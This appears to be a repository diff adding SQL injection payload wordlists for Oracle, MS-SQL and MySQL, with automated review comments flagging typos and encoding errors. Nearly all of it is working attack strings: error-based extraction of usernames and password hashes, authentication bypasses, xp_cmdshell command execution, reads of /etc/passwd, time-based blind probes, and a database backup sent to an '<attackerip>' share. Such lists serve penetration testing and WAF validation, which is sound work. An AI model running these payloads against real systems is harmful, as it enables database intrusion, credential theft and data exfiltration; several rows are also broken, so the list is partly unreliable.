' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i
|
||||
|
193
attack/sql-injection/detect/xplatform.txt
Normal file
193
attack/sql-injection/detect/xplatform.txt
Normal file
|
@ -0,0 +1,193 @@
|
|||
<>"'%;)(&+
|
||||
|
|
||||
!
|
||||
?
|
||||
/
|
||||
//
|
||||
//*
|
||||
'
|
||||
' --
|
||||
(
|
||||
)
|
||||
*|
|
||||
*/*
|
||||
&
|
||||
0
|
||||
031003000270000
|
||||
0 or 1=1
|
||||
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
|
||||
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
|
||||
0x77616974666F722064656C61792027303A303A31302700 exec(@s)
|
||||
1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
|
||||
1 or 1=1
|
||||
1;SELECT%20*
|
||||
1 waitfor delay '0:0:10'--
|
||||
'%20or%20''='
|
||||
'%20or%201=1
|
||||
')%20or%20('x'='x
|
||||
'%20or%20'x'='x
|
||||
%20or%20x=x
|
||||
%20'sleep%2050'
|
||||
%20$(sleep%2050)
|
||||
%21
|
||||
23 OR 1=1
|
||||
%26
|
||||
%27%20or%201=1
|
||||
%28
|
||||
%29
|
||||
%2A%28%7C%28mail%3D%2A%29%29
|
||||
%2A%28%7C%28objectclass%3D%2A%29%29
|
||||
%2A%7C
|
||||
||6
|
||||
'||'6
|
||||
(||6)
|
||||
%7C
|
||||
a'
|
||||
admin' or '
|
||||
' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
|
||||
' and 1 in (select var from temp)--
|
||||
anything' OR 'x'='x
|
||||
"a"" or 1=1--"
|
||||
a' or 1=1--
|
||||
"a"" or 3=3--"
|
||||
a' or 3=3--
|
||||
a' or 'a' = 'a
|
||||
'%20OR
|
||||
as
|
||||
asc
|
||||
a' waitfor delay '0:0:10'--
|
||||
'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login >
|
||||
bfilename
|
||||
char%4039%41%2b%40SELECT
|
||||
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
|
||||
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
|
||||
declare @q nvarchar (4000) select @q =
|
||||
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
|
||||
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
|
||||
declare @s varchar(22) select @s =
|
||||
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
|
||||
delete
|
||||
desc
|
||||
distinct
|
||||
'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
|
||||
'; exec master..xp_cmdshell
|
||||
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
|
||||
exec(@s)
|
||||
'; exec ('sel' + 'ect us' + 'er')
|
||||
exec sp
|
||||
'; execute immediate 'sel' || 'ect us' || 'er'
|
||||
exec xp
|
||||
'; exec xp_regread
|
||||
' group by userid having 1=1--
|
||||
handler
|
||||
having
|
||||
' having 1=1--
|
||||
hi or 1=1 --"
|
||||
hi' or 1=1 --
|
||||
"hi"") or (""a""=""a"
|
||||
hi or a=a
|
||||
hi' or 'a'='a
|
||||
hi') or ('a'='a
|
||||
'hi' or 'x'='x';
|
||||
insert
|
||||
like
|
||||
limit
|
||||
*(|(mail=*))
|
||||
*(|(objectclass=*))
|
||||
or
|
||||
' or ''='
|
||||
or 0=0 #"
|
||||
' or 0=0 --
|
||||
' or 0=0 #
|
||||
" or 0=0 --
|
||||
or 0=0 --
|
||||
or 0=0 #
|
||||
' or 1 --'
|
||||
' or 1/*
|
||||
; or '1'='1'
|
||||
' or '1'='1
|
||||
' or '1'='1'--
|
||||
' or 1=1
|
||||
' or 1=1 /*
|
||||
' or 1=1--
|
||||
' or 1=1--
|
||||
'/**/or/**/1/**/=/**/1
|
||||
‘ or 1=1 --
|
||||
" or 1=1--
|
||||
or 1=1
|
||||
or 1=1--
|
||||
or 1=1 or ""=
|
||||
' or 1=1 or ''='
|
||||
' or 1 in (select @@version)--
|
||||
or%201=1
|
||||
or%201=1 --
|
||||
' or 2 > 1
|
||||
' or 2 between 1 and 3
|
||||
' or 3=3
|
||||
‘ or 3=3 --
|
||||
' or '7659'='7659
|
||||
or a=a
|
||||
or a = a
|
||||
' or 'a'='a
|
||||
' or a=a--
|
||||
') or ('a'='a
|
||||
" or "a"="a
|
||||
) or (a=a
|
||||
order by
|
||||
' or (EXISTS)
|
||||
or isNULL(1/0) /*
|
||||
" or isNULL(1/0) /*
|
||||
' or 'something' like 'some%'
|
||||
' or 'something' = 'some'+'thing'
|
||||
' or 'text' = n'text'
|
||||
' or 'text' > 't'
|
||||
' or uid like '%
|
||||
' or uname like '%
|
||||
' or 'unusual' = 'unusual'
|
||||
' or userid like '%
|
||||
' or user like '%
|
||||
' or username like '%
|
||||
' or username like char(37);
|
||||
' or 'whatever' in ('whatever')
|
||||
' -- &password=
|
||||
password:*/=1--
|
||||
PRINT
|
||||
PRINT @@variable
|
||||
procedure
|
||||
replace
|
||||
select
|
||||
' select * from information_schema.tables--
|
||||
' select name from syscolumns where id = (select id from sysobjects where name = tablename')--
|
||||
' (select top 1
|
||||
--sp_password
|
||||
'sqlattempt1
|
||||
(sqlattempt2)
|
||||
'sqlvuln
|
||||
'+sqlvuln
|
||||
(sqlvuln)
|
||||
sqlvuln;
|
||||
t'exec master..xp_cmdshell 'nslookup www.google.com'--
|
||||
to_timestamp_tz
|
||||
truncate
|
||||
tz_offset
|
||||
' UNION ALL SELECT
|
||||
' union all select @@version--
|
||||
' union select
|
||||
uni/**/on sel/**/ect
|
||||
' UNION SELECT
|
||||
' union select 1,load_file('/etc/passwd'),1,1,1;
|
||||
) union select * from information_schema.tables;
|
||||
' union select * from users where login = char(114,111,111,116);
|
||||
update
|
||||
'||UTL_HTTP.REQUEST
|
||||
,@variable
|
||||
@variable
|
||||
@var select @var as var into temp end --
|
||||
\x27UNION SELECT
|
||||
x' AND 1=(SELECT COUNT(*) FROM tabname); --
|
||||
x' AND email IS NULL; --
|
||||
x' AND members.email IS NULL; --
|
||||
x' AND userid IS NULL; --
|
||||
x' or 1=1 or 'x'='y
|
||||
x' OR full_name LIKE '%Bob%
|
||||
ý or 1=1 --
|
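--- a/attack/sql-injection/exploit/ms-sql-enumeration.txt
+++ b/attack/sql-injection/exploit/ms-sql-enumeration.txt
@@ -0,0 +1,11 @@
+select @@version
+select @@servernamee
+select @@microsoftversione
+select * from master..sysserverse
+select * from sysusers
+exec master..xp_cmdshell 'ipconfig+/all'
+exec master..xp_cmdshell 'net+view'
+exec master..xp_cmdshell 'net+users'
+exec master..xp_cmdshell 'ping+<attackerip>'
+BACKUP database master to disks='\\<attackerip>\<attackerip>\backupdb.dat'
+create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.aspâ'" select * from myfile"--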
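Review bot: Three rows end in a stray `e` (`@@servernamee`, `@@microsoftversione`, `sysserverse`), and the last row contains a mis-encoded byte (`auth.aspâ'`), unbalanced double quotes and two different table names (`myfile` and `foo`). As written these rows fail to parse on the server, so a detection rule or WAF regression test that replays this list only exercises the error path for them. The file should be re-saved as UTF-8 and each row checked against a lab instance before it is merged.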
|
@ -0,0 +1,5 @@
|
|||
<username>' OR 1=1--
|
||||
'OR '' = ' Allows authentication without a valid username.
|
||||
<username>'--
|
||||
' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--
|
||||
'OR 1=1--
|
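Review bot: The second row, `'OR '' = ' Allows authentication without a valid username.`, carries its description on the same line as the test value. A wordlist has no comment syntax, so every tool that reads this file submits the English sentence as part of the string and the row no longer tests what the description says. The explanation belongs in the directory's documentation file, leaving only the test value on the row.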
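--- a/attack/sql-injection/exploit/mysql-read-local-files.txt
+++ b/attack/sql-injection/exploit/mysql-read-local-files.txt
@@ -0,0 +1 @@
+create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;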
|
@ -0,0 +1,107 @@
|
|||
)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
)%20waitfor%20delay%20'0:0:20'%20--
|
||||
')%20waitfor%20delay%20'0:0:20'%20/*
|
||||
')%20waitfor%20delay%20'0:0:20'%20--
|
||||
")%20waitfor%20delay%20'0:0:20'%20/*
|
||||
")%20waitfor%20delay%20'0:0:20'%20--
|
||||
))%20waitfor%20delay%20'0:0:20'%20/*
|
||||
))%20waitfor%20delay%20'0:0:20'%20--
|
||||
'))%20waitfor%20delay%20'0:0:20'%20/*
|
||||
'))%20waitfor%20delay%20'0:0:20'%20--
|
||||
"))%20waitfor%20delay%20'0:0:20'%20/*
|
||||
"))%20waitfor%20delay%20'0:0:20'%20--
|
||||
,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
',NULL)%20waifor%20delay%20'0:0:20'%20/*
|
||||
',NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
",NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
",NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
),NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
),NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
'),NULL)%20waifor%20delay%20'0:0:20'%20/*
|
||||
'),NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
"),NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
"),NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
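Review bot: Two rows spell the keyword `waifor` (the `',NULL)…/*` and `'),NULL)…/*` rows), unlike the other 105, so they can never produce the delay this list is meant to detect and a scan reports them as clean whatever the target does. The six-NULL group also starts at its `--` row with no bare `/*` counterpart, which is why the file has 107 rows instead of 108. Both look like copy errors; generating the list from prefix × column count × terminator would rule them out.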
|
@ -0,0 +1,40 @@
|
|||
waitfor delay '0:0:20' /*
|
||||
waitfor delay '0:0:20' --
|
||||
' waitfor delay '0:0:20' /*
|
||||
' waitfor delay '0:0:20' --
|
||||
" waitfor delay '0:0:20' /*
|
||||
" waitfor delay '0:0:20' --
|
||||
) waitfor delay '0:0:20' /*
|
||||
) waitfor delay '0:0:20' --
|
||||
)) waitfor delay '0:0:20' /*
|
||||
)) waitfor delay '0:0:20' --
|
||||
))) waitfor delay '0:0:20' /*
|
||||
))) waitfor delay '0:0:20' --
|
||||
)))) waitfor delay '0:0:20' /*
|
||||
)))) waitfor delay '0:0:20' --
|
||||
))))) waitfor delay '0:0:20' --
|
||||
)))))) waitfor delay '0:0:20' --
|
||||
') waitfor delay '0:0:20' /*
|
||||
') waitfor delay '0:0:20' --
|
||||
") waitfor delay '0:0:20' /*
|
||||
") waitfor delay '0:0:20' --
|
||||
')) waitfor delay '0:0:20' /*
|
||||
')) waitfor delay '0:0:20' --
|
||||
")) waitfor delay '0:0:20' /*
|
||||
")) waitfor delay '0:0:20' --
|
||||
'))) waitfor delay '0:0:20' /*
|
||||
'))) waitfor delay '0:0:20' --
|
||||
"))) waitfor delay '0:0:20' /*
|
||||
"))) waitfor delay '0:0:20' --
|
||||
')))) waitfor delay '0:0:20' /*
|
||||
')))) waitfor delay '0:0:20' --
|
||||
")))) waitfor delay '0:0:20' /*
|
||||
")))) waitfor delay '0:0:20' --
|
||||
'))))) waitfor delay '0:0:20' /*
|
||||
'))))) waitfor delay '0:0:20' --
|
||||
"))))) waitfor delay '0:0:20' /*
|
||||
"))))) waitfor delay '0:0:20' --
|
||||
')))))) waitfor delay '0:0:20' /*
|
||||
')))))) waitfor delay '0:0:20' --
|
||||
")))))) waitfor delay '0:0:20' /*
|
||||
")))))) waitfor delay '0:0:20' --
|
|
@ -0,0 +1,90 @@
|
|||
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||
